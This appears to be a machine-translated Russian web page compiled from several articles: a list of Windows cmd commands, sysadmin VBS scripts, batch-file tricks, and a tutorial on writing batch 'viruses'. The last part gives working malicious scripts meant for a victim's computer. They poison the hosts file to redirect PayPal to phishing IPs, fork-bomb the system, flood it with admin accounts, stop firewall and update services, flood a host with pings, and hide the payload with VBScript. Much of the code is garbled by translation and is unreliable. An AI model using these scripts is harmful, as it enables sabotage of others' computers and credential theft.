Полезные bat cmd: Полезные скрипты CMD/BAT

Список полезных команд Windows | Техно Дерево

Как управлять компьютером без привычного графического интерфейса? Для этого можно запустить командную строку Windows cmd с помощью комбинации клавиш win+r ,а затем набрать в появившейся консоли cmd и нажать Enter.Открылось окно командной строки. Через него вы можете выключать компьютер, создавать/удалять папки, устанавливать расписание запуска программ, изменять расширение файлов, запускать и останавливать приложения и многое другое.

Если вы хотите, чтобы ряд команд cmd выполнялся на компьютере автоматически, вы можете записать их в блокноте и сохранить текстовый файл с расширением .bat.

Пример содержания простейшего .bat файла:
@echo off
color 0a
chcp 1251
echo Перезагрузка компьютера
pause
shutdown /r

Этот скрипт перезагружает компьютер и требует для этого нажать любую клавишу. Чтобы остановить выполнение скрипта, надо просто закрыть появившееся окно.

Подобные bat-файлы (батники) часто используются для написания компьютерных вирусов, которых кстати говоря, не замечают антивирусные программы (в большинстве случаев). А для скрытности их переводят в exe-формат.

Подробнее вы можете ознакомиться с командами cmd ниже (или можно просто написать help в командной строке).

A
append — позволяет программам открывать файлы в указанных каталогах так , словно они находятся в текущем каталоге.
arp — отображение и изменение таблиц преобразования IP-адресов в физические, используемые протоколом разрешения адресов.
assoc — вывод либо изменение сопоставлений по расширениям имён файлов.
at — команда предназначена для запуска программ в указанное время.
atmsdm — Контроль подключений и адресов, зарегистрированных диспетчером вызовов ATM в сетях с асинхронным режимом передачи (ATM).
attrib — изменение атрибутов файлов и папок.
auditusr — задаёт политику аудита пользователей.

B
break — включение режима обработки клавиш CTRL+C.
bootcfg — эта программа командной строки может быть использована для настройки , извлечения , изменения или удаления параметров командной строки в файле Boot. ini.

C
cacls — просмотр изменение таблиц управления доступом ACL к файлам.
call — вызов одного пакетного файла из другого.
cd — вывод имени либо изменение текущей папки.
chcp — вывод либо изменение активной кодовой страницы.
chdir — вывод либо смена текущей папки.
chkdsk — проверка диска и вывод отчёта.
chkntfs — выводит или изменяет параметры проверки диска во время загрузки.
ciddaemon — сервис индексации файлов.
cipher — программа шифрования файлов.
cls — очистка экрана интерпретатора.
cmd — запуск нового окна командной строки.
cmstp — установка профилей диспетчера подключений.
color — устанавливает цвет для текста и фона в текстовых окнах.
comp — сравнение содержимого двух файлов или наборов файлов.
compact — просмотр и изменение параметров сжатия файлов в разделах NTFS.
convert — преобразование файловой системы тома FAT в NTFS.
copy — копирование одного или нескольких файлов.

D
date — вывод либо установка текущей даты.
debug — средство для отладки и редактирования программ.
defrag — дефрагментация диска.
del — удаление одного или нескольких файлов.
devcon — альтернатива диспетчера устройств.
diantz — тоже что и MAKECAB.
dir — вывод списка файлов и подпапок из указанного каталога.
diskcomp — сравнение содержимого двух гибких дисков.
diskcopy — копирование содержимого одного гибкого диска на другой.
diskpart — использования сценария diskpart.
diskperf — счетчик производительности дисков.
doskey — редактирование и повторный вызов команд Windows; создание макросов DOSKey.
driverquery — просмотр списка установленных драйверов устройств и их свойства.

E
echo — вывод сообщений и переключение режима отображения команд на экране.
edit — запуск редактора MS-DOS.
endlocal — завершение локализации изменений среды в пакетном файле.
edlin — запуск построчного текстового редактора.
erase — удаление одного или нескольких файлов.
esentutl — обслуживание утилит для Microsoft (R) баз данных Windows.
eventcreate — эта команда позволяет администратору создать запись об особом событии в указанном журнале событий.
eventtriggers — эта команда позволяет администратору отобразить и настроить триггеры событий в локальной или удаленной системе.
exe2bin — преобразование EXE-файлов в двоичный формат.
exit — завершение командной строки.
expand — распаковка сжатых файлов.

F
fc — сравнение двух файлов или двух наборов файлов и вывод различий между ними.
find — поиск текстовой строки в одном или нескольких файлах.
findstr — поиск строк в файлах.
finger — вывод сведений о пользователях указанной системы.
fltmc — работа с фильтром нагрузки драйверов.
for — выполнение указанной команды для каждого файла набора.
forcedos — сопоставление приложений MS-DOS, которые не распознаются системой Microsoft Windows XP.
format — форматирование диска для работы с Windows.
fontview — программа просмотра шрифтов.
fsutil — управление точками повторной обработки, управление разреженными файлами, отключение тома или расширение тома.
ftp — программа передачи файлов.
ftype — просмотр и изменение типов файлов, сопоставленных с расширением имен файлов.

G
getmac — отображает MAC-адрес одного или нескольких сетевых адаптеров компьютера.
goto — передача управления содержащей метку строке пакетного файла.
gpresult — отображает результирующую политику (RSoP) для указанного пользователя и компьютера.
gpupdate — выполнение обновления групповых политик.
graftabl — выбор кодовой страницы для отображения символов национальных алфавитов в графическом режиме.

H
help — выводит не полный список команд, которые используются в cmd.
hostname — отображение имени компьютера.

I
if — оператор условного выполнения команд в пакетном файле.
ipconfig — вывод маску подсети, стандартный шлюз и информацию о вашем IP.
ipxroute — программа управления маршрутизацией NWLink IPX.

L
label — создание, изменение и удаление меток тома для диска.
lodctr — обновление имен счётчиков и поясняющего текста для расширенного счётчика.
logman — управление расписанием для счетчиков производительности и журнала трассировки событий.
logoff — завершение сеанса Windows.
lpq — отображение состояния очереди удалённой очереди печати lpq.
lpr — направляет задание печати на сетевой принтер.
lsass — сервер определения локальной защиты.

M
makecab — архивирование файлов в cab-архив.
md — создание папки.
mem — выводит сведения об используемой и свободной памяти.
mkdir — создание папки с расширенной функциональностью.
mmc — открытие окна консоли MMC.
mode – отладка системных устройств.
mofcomp — 32-разр. компилятор Microsoft (R) MOF.
more — последовательный вывод данных по частям размером в один экран.
mountvol — просмотр, создание и удаление точек подключения тома.
move — перемещение и переименование файлов и каталогов.
mqbkup — утилита архивирования и восстановления очереди сообщений.
mqsvc — обеспечивает инфраструктуру для работы распределенных приложений.
mrinfo — работа с многоадресными рассылками.
msg — отправка сообщений пользователю.
msiexec — запуск установщика Windows.

N
nbtstat — отображение статистики протокола и текущих подключений TCP/IP с помощью NBT (NetBIOS через TCP/IP).
net — пакет приложений предназначенный для работы с сетью.
net1 — тоже самое что и net.
netsh — локальное или удаленное отображение и изменение параметров сети.
netstat — отображение статистики протоколов и текущих сетевых подключений TCP/IP.
nlsfunc — загрузка сведений о национальных стандартах.
nslookup — вывод информации, предназначенный для диагностики DNS.
ntbackup — запуск мастера архивирования.
ntsd — отладчик командной строки.

O
odbcconf — настройка драйвера ODBC.
openfiles — эта команда позволяет пользователю вывести список открытых файлов и папок, которые были открыты в системе.

P
pagefileconfig — настройка файлов подкачки и виртуальной памяти.
path — вывод либо установка пути поиска исполняемых файлов.
pathping — вывод информации о скрытый сетях и потери данных.
pause — приостанавливает выполнение сценария cmd.
pentnt — обнаруживает ошибки деления с плавающей точкой процессора Pentium, отключает аппаратную обработку чисел с плавающей точкой и включает эмуляции операций с плавающей точкой.
perfmon — открывает окно «Производительность».
ping — проверяет соединение с другим компьютером.
ping6 — команда проверки связи.
popd — изменяет одну папку на ту, которая была сохранена командой PUSHD.
powercfg — эта команда позволяет управлять электропитанием системы.
print — печать текстового файла.
prncnfg — настройка параметров принтера.
prompt — изменение приглашения командной строки cmd.exe.
proxycfg — инструмент настройки proxy соединения.
pushd — сохранения значений текущего каталога для использования POPD командой.

Q
qappsrv — отображает доступные серверы терминалов в сети.
qprocess — отображает информацию о процессах.
qwinsta — отображение информации о сеансах терминалов.

R
rasdial — интерфейс связи из командной строки для клиента службы удалённого доступа.
rcp — обмен файлами с компьютером, на котором выполняется служба RCP.
recover — восстановление сохранившихся данных на поврежденном диске.
reg — редактирование системного реестра через командную строку.
regsvr32 — сервер регистрации.
relog — создает новый журнал производительности из уже имеющего.
rem — помещение комментария в пакетный файл.
ren — переименование файлов и папок.
rename — переименование файлов и папок.
replace — замена файлов.
reset — утилита сброса служб терминалов.
rexec — выполнение команд на удаленных узлах на которых выполняется служба rexec.
rd — удаление папки.
rmdir — удаление папки.
route — обработка таблиц сетевых маршрутов.
rsh — выполнение команд на удаленных узлах, на которых запущена служба RSH.
rsm — управление ресурсами носителей с помощью службы «Съемные ЗУ».
runas — использование приложений от имени другого пользователя.
rundll32 — запуск стандартных команд-функций заложенных в dll.
rwinsta — сброс значений подсистем оборудования и программ сеанса в начальное состояние.

S
sc — установление связи с NT Service Controller и ее услугами.
schtasks — создание, удаление, изменение и опрос запланированных задачи в локальной или удаленной системе.
sdbinst — установщик базы данных совместимости.
secedit – автоматизация задач настройки безопасности.
set — вывод, присваивание и удаления переменных в командной строке.
setlocal — начало локализации изменений среды в пакетном файле.
setver — задает номер версии, который MS-DOS сообщает программе.
sfc — проверка файлов Windows.
shadow — позволяет наблюдать за другим сеансом служб терминалов.
shift — изменение содержимого подставляемых параметров для пакетного файла.
shutdown — завершение сеанса, выключение и перезагрузка системы Windows.
smbinst — это процесс, принадлежащий System Management BIOS Driver Installer.
sort — сортирование файлов.
start — запуск программы или команды в отдельном окне.
subst — сопоставление имени диска указанному пути.
systeminfo — вывод информации о настройках системы.

T
taskkill — завершение одного или нескольких процессов.
tasklist — показывает запущенные программы и процессы выполняемые в данный момент.
tcmsetup — установка клиента телефонии.
tftp — обмен файлами с удаленным компьютером, на котором запущена служба TFTP.
time — просмотр или изменение текущего времени.
title — назначение заголовка окна интерпретатора.
tlntadmn — удаленное управление компьютером.
tracert — трассировка маршрута к указанному узлу.
tracerpt — обрабатывает двоичные файлы журнала отслеживания событий или потоки данных.
tracert6 — версия tracert для протокола IPv6.
tree — вывод структуры диска или каталога в виде дерева.
tscon — присоединяет сеанс пользователя к сеансу терминала.
tsdiscon — отключение сеанса терминала.
tskill — прекращение процесса.
tsshutdn — завершение работы сервера в установленном порядке.
type — вывод на экране содержимого текстовых файлов.
typeperf — выводит сведения о производительности на экран или в журнал.

U
unlodctr — удаление имен счётчиков и поясняющего текста для расширенного счётчика.
userinit — проводник системы Windows.

V
ver — вывод сведений о версии Windows.
verify — установка режима проверки правильности записи файлов на диск.
vol — вывод метки и серийного номера тома для диска.
vssadmin — инструмент командной строки теневого копирования тома.

W
w32tm — диагностика службы времени.
wbemtest — тестер инструментария управления Windows.
winver — вывод информации о версии Windows.
wmic — инструмент для написания сценариев.
Xxcopy — копирование файлов и дерева папок.

 

Полезные скрипты [vbs,bat] для сисадмина. Часть 3 — 00m.Ru

Adminв

Полезные скрипты [vbs,bat] для сисадмина. Часть 3

Очередная подборка моих любимых скриптов, которыми часто пользуюсь.

del_hidden_share.reg (Удаление скрытых ресурсов)

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
«AutoShareWks»=dword:00000000

add shortcut.vbs (Создание ярлыка для сетевой программы на рабочем столе всем пользователям. Добавляется как Logon-скрипт через политики и все. )

Set WshShell = WScript.CreateObject(«WScript.Shell»)

‘ Путь до рабочего стола через спец переменную
strDesktop = WshShell.SpecialFolders(«Desktop»)

‘ Создание ярлыка:
Set oShellLink = WshShell.CreateShortcut(strDesktop & «\Texpert.lnk»)

‘ Целевой путь к файлу для которого создаётся ярлык:
oShellLink. TargetPath = «\\server\Texpert\texpert.exe»

‘ Стиль открытия окна:
‘ 1 — Обычный размер окна; 3 — Развёрнутое на весь экран; 7 — Свёрнутое в значoк
oShellLink.WindowStyle = 1

‘ Клавиши быстрого вызова:
‘ oShellLink.Hotkey = «CTRL+SHIFT+F»

‘ Путь к файлу который содержит иконку для ярлыка:
oShellLink.IconLocation = «\\server\Texpert\texpert.exe, 0»

‘ Комментарий:
oShellLink.Description = «Сетевая программа»

‘ Рабочая папка:
oShellLink.WorkingDirectory = «\\server\Texpert»

‘ Аргументы командной строки:
‘ Аргументы имеют смысл если файл к которому обращается ярлык — исполняемый, т.е. имеет одно из следующих расширений: .exe; .bat; .com; .cmd; .vbs и т.д.
‘ oShellLink.Arguments = «C:\MyFile.txt»
‘ Сохранение ярлыка на жестком диске:
oShellLink.Save

print_event.vbs (Скрипт генерирует и открывает HTML-отчет использования принтеров организации.  Уточнение: сетевые принтеры подключены пользователям не напрямую, а через сервер. Т.е. все данные берутся из Журнала Событий сервера. Потратил 2 часа на написание сего скрипта 🙂 Люблю покодить иногда)

‘ Скрипт генерирует отчет использования принтеров организации, подключенных к серверу.
‘ Уточнение: все данные берутся из журнала событий сервера.
‘ Автор Алексей http://blog.lapitoop.ru
‘ —— SCRIPT CONFIGURATION ——
DIM len_name,name,len_domain
strComputer = «.» ‘Local Computer
LogFolder = «C:\»
Title=»Статистика печати в нашей компании» ‘Заголовок отчета (Title)
domain=»domain»
‘ —— SCRIPT CONFIGURATION ——

‘Функции преобразования даты и времени в человеческий вид
Function WMIDateToString(dtmDate)
WMIDateToString = (Mid(dtmDate, 5, 2) & «/» & _
Mid(dtmDate, 7, 2) & «/» & _
Left(dtmDate, 4) & » «)
End Function

Function WMITimeToString(dtmTime)
WMITimeToString = (Mid(dtmTime, 9, 2) & «:» & _
Mid(dtmTime, 11, 2) & «:» & _
Mid(dtmTime, 13, 2))
End Function

Set FSO = CreateObject(«Scripting. FileSystemObject»)
Set LogFile = FSO.OpenTextFile(LogFolder & «Event_printer.html», 2, True)

Set objWMIService = GetObject(«winmgmts:» _
& «{impersonationLevel=impersonate}!\\» & strComputer & «\root\cimv2»)
Set colLoggedEvents = objWMIService.ExecQuery _
(«Select * from Win32_NTLogEvent Where Logfile = ‘System’ and » _
& «EventCode = ’10′»)

LogFile.WriteLine «<html>»
LogFile.WriteLine «<head>»
LogFile.WriteLine «<title>» & Title & » от » & date() & «</title>»
LogFile.WriteLine «</head>»
LogFile.WriteLine «»
LogFile.WriteLine «<table border=1>»
LogFile.WriteLine «<tr>»
LogFile.WriteLine «<td><strong>Пользователь</strong></td><td><strong>Дата и время</strong></td><td><strong>Сообщение</strong></td>»
LogFile.WriteLine «</tr>»

For Each objEvent in colLoggedEvents

‘ Обрезаем домен в полученном имени пользователя (вместо DOMAIN\User будет просто User)
len_name=Len(objEvent. User)-Len(domain)-1
name=Right(objEvent.User,len_name)

LogFile.WriteLine «<tr>»
LogFile.WriteLine «<td>»& name & «</td><td>» & WMIDateToString(objEvent.TimeWritten) & » » & WMITimeToString(objEvent.TimeWritten) & «</td><td>» & objEvent.Message & «</td>»
LogFile.WriteLine «</tr>»

Next

LogFile.WriteLine «</table>»
LogFile.WriteLine «</html>»
LogFile.Close

‘Автооткрытие сгенерированного отчета
Set WShell = CreateObject(«WScript.Shell»)
ReturnCode = WShell.Run(LogFolder & «Event_printer.html», 1, false)


РубрикиБез рубрики

Что такое пакетные файлы в Windows? Веселые и крутые трюки с пакетными файлами

Пакетные файлы в Windows — это файлы сценариев. Пакетный файл представляет собой неформатированный текстовый файл. Этот файл состоит из набора команд и имеет расширение .bat или . cmd . Термин «пакет» адаптирован из пакетной обработки, что означает неинтерактивное выполнение. С помощью пакетных файлов в Windows пользователи могут упростить повторяющиеся или рутинные задачи. Когда пользователи вводят имя файла в командной строке, cmd.exe запускает команды последовательно, как они появляются в файле. Некоторые типичные команды, используемые в пакетных файлах в Windows: Call, Echo, Endlocal, For, Goto, If, Pause, Rem, Setlocal и Shift.

Как создать .bat или пакетные файлы в Windows

Как упоминалось ранее, пакетный файл содержит серию из команд DOS и используется для автоматизации часто выполняемых задач. Таким образом, вам не придется повторно писать одни и те же команды.

Пакетный файл создается с помощью Блокнота . Текстовый файл состоит из команд, которые вы хотите выполнить. Чтобы создать пакетный файл , вы должны написать команду в виде текста в Блокноте и сохранить файл как файл . bat. до выполните команду , вам просто нужно дважды щелкнуть пакетный файл. Следовательно, хорошо написанный пакетный файл в Windows может сэкономить много времени.

Некоторые основные команды в пакетных файлах:

  • ECHO: для отображения текста на экране
  • @ECHO OFF: для скрытия текста
  • START: для запуска файла с приложением по умолчанию
  • REM: для ввода строка комментария в программе
  • MKDIR: для создания каталогов
  • RMDIR: для удаления каталогов
  • DEL: для удаления файлов
  • COPY: для копирования файла или файлов
  • XCOPY: для копирования файлов с дополнительными параметрами
  • FOR/IN/DO: для указания файлов
  • TITLE: для редактирования заголовка окна

Классные и забавные трюки с пакетными файлами

1. Матрица

Помните фильм «Матрица»? Вы действительно можете сделать свой фон похожим на этот зеленый экран Matrix с помощью этого командного файла. Это определенно для крутого взгляда и ничего больше. Чтобы создать пакетные файлы такого типа в Windows, выполните следующие действия:

Шаг 1: Откройте текстовый документ и переименуйте его в «matrix.bat». Как только расширение текстового файла изменится на .bat, его значок изменится на шестеренку.

Шаг 2: Теперь вы можете отредактировать файл, чтобы написать свою программу. Для этого щелкните файл правой кнопкой мыши и выберите «Редактировать». Он должен открыться в блокноте. Вот командные строки, которые нужно вставить в блокнот.

@echo off

цвет 2

:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

перейти к началу

Нажмите «Сохранить» и дважды щелкните по нему. Это даст матричный эффект в окне. Разверните окна CMD и нажмите F11, чтобы получить лучший полноэкранный эффект.

2. Password Creator

Вы даже можете создать файл, защищенный паролем, который создается и доступен с помощью пакетного (.bat) файла. Это один из слегка полезных пакетных файлов в Windows, который должен отлично работать, чтобы скрывать вещи от людей, мало или совсем не знакомых с компьютером или пакетными файлами.

Следуйте этим шагам, чтобы создать пакетные файлы создателя пароля в Windows:

Шаг 1: Открыть блокнот

Шаг 2: Копировать и вставьте следующий код

CLS

@ECHO OFF

CLS

@ECHO OFF

CLS

title Cyber ​​Attack Weapon System

если СУЩЕСТВУЕТ "Панель управления.{21EC2020-3AEA-1069-A2DD-08002B30309D}" перейти к РАЗБЛОКИРОВАТЬ

если НЕ СУЩЕСТВУЕТ скрыто перейти к 9 скрыто0002 :CONFIRM

эхо Вы уверены, что заблокировали эту папку? (Y/N)

set/p "cho=>"

if %cho%==Y перейти к LOCK

если %cho%==y перейти к LOCK %

900 %==n goto END

if %cho%==N goto END

echo Неверный выбор.

перейти ПОДТВЕРДИТЬ

:LOCK

ren Скрытая панель управления.{21EC2020-3AEA-1069-A2DD-08002B30309D} "

Атриб +H +S" Панель управления. {21EC2020-3AEA-1069-A2DD-08002B3093

ECHO Введите пароль, чтобы разблокировать безопасную папку

SET/P "Pass =>"

, если не %pass %== 1234 Goto Fail

GOTO ONLOCK2

9002

GOTO ONLOC

CLS

ECHO Введите пароль, чтобы разблокировать вашу безопасную папку

SET/P "PASS =>"

, если не %pass %== 1234 Fail

атрибу "Панель управления. {21EC2020-3AEA-1069-A2DD-08002B30309D}"

REN "Панель управления. перейти к концу

: Fail

@echo OFF

ЦВЕТ 02

ECHO Предупреждающий вирус Инициировал общее количество Hardrive.

:tricks

if %count% == 200 goto shutdown

echo %random%%random%%random%%random%%random%%random%%random%0092random%

echo набор /количество=%количество%+1

GOTO TRICKS

: Закрытие

CLS

: Выключение

Закрытие -s -S 45 /c "Вы пробовали Acces A Acces, а не ваш. До свидания."

echo Введите пароль Start Abort Sequence

set/p "pass=>"

if NOT %pass%== 1234 goto shutdown 9000ated 7 90 Abortit 906 Abortit0009

goto Abort

:Abort

C:\Windows\System32\shutdown.exe -a

Abort Successful

timeout /t 3 /nobreak >nul

CLS

GOTO ONLOCK

GOTO END

: MDHIDDEN

MD Hidden

ECHO Hidden Created Create

ECHO Hidden Created Create

. 0004 Установите пароль

Пароли по умолчанию установлены на 1234. Их также можно изменить. Чтобы изменить пароль, найдите в коде, где написано:

, если НЕ %pass%== 1234, перейдите на

и замените 1234 на выбранный вами пароль. Сохраните файл с расширением .bat.

Когда вы открываете файл в первый раз, он мигает, и появляется другой файл с именем «Скрытый». Чтобы скрыть этот файл, просто щелкните исходный файл еще раз, и он спросит вас, хотите ли вы скрыть файл. Если вы наберете Y, он скроет его, но если вы наберете N, ничего не произойдет. После того, как вы скроете его и позже захотите получить к нему доступ, вам нужно снова щелкнуть исходный файл, и он запросит у вас пароль.

Однако следует помнить, что метод не является надежным. Любой, у кого мало знаний или опыта работы с компьютерными системами и пакетными файлами, скорее всего, сможет обойти его довольно быстро.

3. Color Tester

Если вы хотите протестировать цвет с помощью пакетных файлов в Windows, то вот код для него. Это просто, и это может быть очень полезно.

Откройте блокнот и скопируйте и вставьте следующий код.

@echo off
: тест
помощь цвет
эхо ------------------------------------------ ----------------
эхо.
echo Введите цветовой код для проверки цветов.
echo Для выхода просто нажмите X.
set/p color=
color %color%
goto test

Сохраните файлы с расширением .bat.

Если вы хотите узнать больше о таких трюках с пакетными файлами в Windows, вы можете посетить Instructable.com.

11 безумных вещей, которые можно сделать с помощью пакетного программирования

Привет! В этой статье мы научимся создавать некоторые вирусные программы с помощью пакетных скриптов.

Давайте перейдем к некоторым серым оттенкам пакетного программирования. Подождите, подождите,

 что это за пакетное программирование в первую очередь?

Не волнуйтесь, к концу этой статьи вы узнаете, что такое пакетное программирование и некоторые интересные вещи, такие как программирование вирусов с помощью пакетного сценария.

1. Что такое партия?

Проще говоря, общее значение пакета — это сбор вещей в единое целое. Технически мы называем их здесь набором команд.

Пакетный файл содержит набор команд, которые будут выполняться на уровне операционной системы. Обычно пакетные файлы имеют расширение .bat. Эти файлы интерпретируются построчно в интерпретаторе командной строки cmd.exe во всех операционных системах семейства DOS, таких как FreeDos и MS-Dos и т. д. В Unix, например, в операционных системах, пакетный файл называется сценарием оболочки. Пакет команд, выполняемых в одном скрипте, называется пакетным скриптом.

2.Что такое пакетное программирование?

Это собственный язык программирования для Windows, который обрабатывает команды Dos как последовательность. Пакетные файлы запрограммированы набором команд, которые будут выполняться построчно. Эта последовательность команд используется для операций более низкого уровня при операциях с дисками и на уровне операционной системы. обычно это удаление файлов того же или другого типа, очистка системного процесса, завершение задач, планирование идентификаторов процессов, очистка некоторых ошибок в операционной системе и т. д.
Создание программ для выполнения некоторых автоматизированных задач, таких как удаление временных файлов и любые другие действия, может быть выполнено с помощью пакетного программирования в Windows и сценариев оболочки в Linux

Какие есть режимы в пакете?

Они делятся на два типа пакетных режимов.

  • интерактивный режим.

В этом режиме требуется вмешательство человека для выполнения задачи после выполнения для файла. Основываясь на человеческом вводе, будут выполняться операции. Это похоже на то, как программа спрашивает, действительно ли вы хотите удалить какой-либо файл, или спрашивает, сколько раз вы хотите сделать то или иное действие.

  • пакетный режим (тихий режим).

Этот режим полностью противоположен интерактивному режиму. После выполнения командного файла все будет работать в фоновом режиме. В этом режиме нет необходимости в человеческом взаимодействии. Не нужно никаких материалов или инструкций для нашей стороны.

Теперь мы собираемся собрать наш пакетный вирус в этом режиме. Но прежде чем перейти к этому, нам нужно ознакомиться с командами, которые будут использоваться.

3.Тип пакетных команд.

  • внутренние команды.

Внутренние команды — это те, которые по умолчанию поставляются с операционными системами, другими словами, мы называем их встроенными командами. Например, dir, cls, echo, del и многие другие.

  • внешние команды.

Внешние команды напоминают команды, часто создаваемые после установки каких-либо приложений. В основном некоторые внешние команды будут работать только в окне запуска. Например: PsExec , PsFile , PsGetSid , PsInfo , PsKill , PsList , PsLoggedOn и так далее.

"cd"                     —- сменить директора.

":  и перейти"        —- для импликации цикла.

«эхо»               —- печать.

«echo off»         —- остановить печать выполнения пакетного файла.

«вызов»                     — используется для запуска или вызова файла и команд.

«старт»                   — для запуска приложений и служб.

«net users»          —- Добавляет или изменяет учетные записи пользователей или отображает информацию об учетных записях пользователей                      — добавление содержимого в редактор регистров

«ping»                     — отправка пакетов по сети для определения работоспособности или отсутствия хоста

4. Как создать пакетную программу?

Для создания пакетной программы откройте любой текстовый редактор и программу с некоторыми командами и сохраните с расширением .bat, вот и все, вы получите исполняемую пакетную программу. Логотип будет таким для пакетных файлов

5. Вирус программирования для машин Windows.

Прежде чем начать небольшое предостережение! при этом вся информация в этой статье предназначена только для образовательных целей. Мы не несем ответственности за то, что вы делаете. Начнем с

Вирус репликатора папок:

 cd\
компакт-диск C:\Пользователи\имя пользователя\Рабочий стол
:петля
мд вирус
компакт-диск вирус
перейти в петлю
 

  Сохраните его как пакетный файл с расширением .bat, прежде чем сделать это, вы должны изменить код, изменив место, где он говорит «9».0468 имя пользователя ’ и вместо этого замените его текущим именем пользователя, вошедшим в систему. Это путь, очень хочется увидеть волшебство. Репликация папок будет происходить в этом месте. Затем запустите его на компьютере жертвы, чтобы заразить его.

  Как бы то ни было, особого вреда не причиняет, но копирует папку внутри папки и так далее. Это создаст каталог внутри другого каталога с тем же именем, так что это не будет выглядеть дерьмом, поскольку все находится внутри одного основного каталога, более того, удаление корневого каталога удалит все неуклюжие вещи, сделанные этим фрагментом кода.

Отравление DNS:

Пакетный файл может иметь возможность модифицировать хост-файл DNS, который находится внутри C:\windows\system32\drivers\etc\hosts на некоторые вредоносные веб-сайты вместо того, чтобы направить вас на законный веб-сайт. Это также может быть использовано для фишинга, то есть для перенаправления вас на поддельный веб-сайт, который выглядит точно так же, как настоящий, созданный хакерами, а затем для кражи учетных данных. Но для этого скрипта вам нужны права администратора.

 @эхо выключено
эхо 10.109.74.45 www.google.com >> C:\windows\system32\drivers\etc\hosts
эхо 10.115.46.73 www.paypal.com >> C:\windows\system32\drivers\etc\hosts
выход
 

Эта программа создает новую запись в файле hosts, так что всякий раз, когда пользователь пытается получить доступ к этому сайту, он/она будет перенаправлен на поддельный фишинговый сайт, размещенный на том IP-адресе, который мы изменили. В приведенном выше случае всякий раз, когда пользователь пытается открыть сайт www.paypal.com, он будет перенаправлен на 10.115.46.73, хакер создаст поддельный сайт PayPal, который выглядит точно так же, как оригинальный законный сайт. Чтобы он мог получить учетные данные, когда вы вошли.

Интересно прочитать: Видеоруководство по отравлению DNS

Форк-бомбардировка:

Большинство из нас слышали о слове ' fork() ', которое используется для создания нового процесса, например мудрого fork. бомбардировка — это не что иное, как вызов программы сам по себе снова и снова с бесконечным циклом и крах системы из-за появления на экране сотен окон.

 @эхо выключено
:петля
Исследователь
Вызов forkBomb.bat
Перейти к петле
 

Скопируйте указанную выше программу, вставьте ее в файл блокнота и сохраните как «forkBomb.bat». Команда проводника, заданная внутри файла, откроет проводник, затем из-за цикла снова вызывается тот же командный файл, который, в свою очередь, открывает несколько проводников, аналогичным образом он продолжает вызывать саму программу снова и снова, пока система не выйдет из строя или не зависнет. вверх.

Application Bomber:

Application Bomber очень похож на Fork Bombing, который мы видели ранее, но здесь, когда файл выполняется, он начинает открывать все приложения, запрограммированные в этом файле, и цикл продолжается до тех пор, пока пользователь закрыл терминал cmd, на котором запущен этот пакетный файл.

 @эхо выключено
:петля
запустить блокнот
запустить винворд
запустить mspaint
начать писать
запустить командную строку
запустить проводник
начать контроль
запустить фаерфокс
запустить msconfig
перейти в петлю
 

Эта пакетная программа открывает следующие приложения, такие как блокнот, MS Word, Microsoft Paint, WordPad, командную строку, файловый менеджер, панель управления и Firefox в бесконечном цикле, что приводит к краху системы и, как результат, к простому сбою системы. или перезагружается.

Пользовательский флудер:

пользовательский флудер — это программа, которая заливает учетные записи пользователей. Он начнет создавать множество учетных записей пользователей в системе, которую он собирается выполнить.

 @эхо выключено
:usrflood
установить usr=%random%
пользователей сети %usr% %random% /добавить
сетевые администраторы локальной группы %usr% /add
перейти к usrflood
 

Учетные записи пользователей будут созданы со случайным числом в качестве имени пользователя с помощью переменной среды «%random%». И пароль также будет назначен напрямую, так как он запрограммирован, это тоже случайное число. Всем учетным записям пользователей будут присвоены права администратора.

Флудер Matrix Folder:

Следующая программа заполнит ваш компьютер папками. Эта программа имеет тенденцию создавать более 3000 папок менее чем за минуту со случайными числами.

 @эхо выключено
:петля
мкдир %случайный%
перейти в петлю
 

Выше скриншот с моего рабочего стола в левом верхнем углу видно флуд с именем батника. Я запустил этот файл только на 2 секунды, он испортил мой рабочий стол, поэтому Халк выглядит более злым!

Блокировщик службы:

Да! То, что вы думаете, правильно. Приведенный ниже фрагмент кода остановит некоторые важные службы Windows.

 @эхо выключено
чистая остановка «Брандмауэр Windows»
чистая остановка «Центр обновления Windows»
чистая остановка рабочая станция
чистая остановка "DHCP-клиент"
чистая остановка "DNS-клиент"
чистая остановка «Диспетчер очереди печати»
чистая остановка Темы
выход
 

эта программа начнет останавливать вышеупомянутые системные службы. Что мне больше всего нравится в этом фрагменте кода, так это то, что он также может останавливать службы антивируса. Чтобы мы могли делать больше вредоносных действий, которые антивирус больше не может остановить. Жертве необходимо включить или запустить остановленные службы вручную.

Повторное сопоставление нажатия клавиш:

Следующий код фрагмента пакетной программы помогает переназначить нажатие клавиши путем изменения записи « scancodemap » в редакторе реестра. Прилагаемый здесь код изменяет ключ с A на B, так что если какой-либо пользователь нажмет клавишу « a » на клавиатуре, он получит « b », отображаемый на экране, также вы можете сопоставить любые клавиши.

 @эхо выключено
reg add "HKLM\System\CurrentControlSet\Control\Раскладка клавиатуры" /v "ScancodeMap" /t REG_BINARY /d 000000000000000000200000030001e00000000000
выход
 

Если вы хотите испачкать руки для переназначения других клавиш, вы должны указать коды ascii для каждой клавиши, которая была предварительно назначена.

 

Пакетный флудер:

Пакетный флудер будет действовать как пинг смерти. Это замедлит работу компьютера в вашей сети, введя IP-адрес системы в наш код. Но один недостаток этого кода заключается в том, что он также замедляет нашу систему, потому что открывает много терминалов cmd. Приводит к затоплению терминалов в вашей системе.

 @эхо выключено
:петля
пинг -л 65535 -т 192.168.1.101
запустить pingflooder.bat
перейти в петлю
 

или же вы можете запустить этот код в системе жертвы и ввести IP-адрес самой жертвы. Таким образом, это становится двусторонней атакой.

Скрытый вирус, использующий VBscript:

Единственная проблема, связанная с вышеперечисленными пакетными кодами вирусов, заключается в том, что при выполнении он начинает открывать терминал cmd. Чтобы жертва знала о чем-то ненормальном. Итак, мы собираемся сделать эти вирусы в скрытом режиме.

 Установить objShell = CreateObject("WScript.Shell")
strCommand = "C:\yourfile.bat"
objShell.Run strCommand, vbHide, TRUE
 

Все, что вам нужно сделать, это просто скопировать путь к пакетному вирусу с именем и расширением на свой компьютер и вставить его в указанный выше vbscrpit (visual basic). Итак, не нужно запускать пакетный файл, достаточно выполнить этот VBscript, он заставляет пакетный файл выполняться в скрытом режиме. он работает в фоновом режиме и остается скрытым. Этот файл необходимо сохранить в расширении .vbs. Это сделает наш вирус скрытым во время выполнения. Единственный способ завершить процесс — открыть диспетчер задач и убить процесс с надписью WScript.

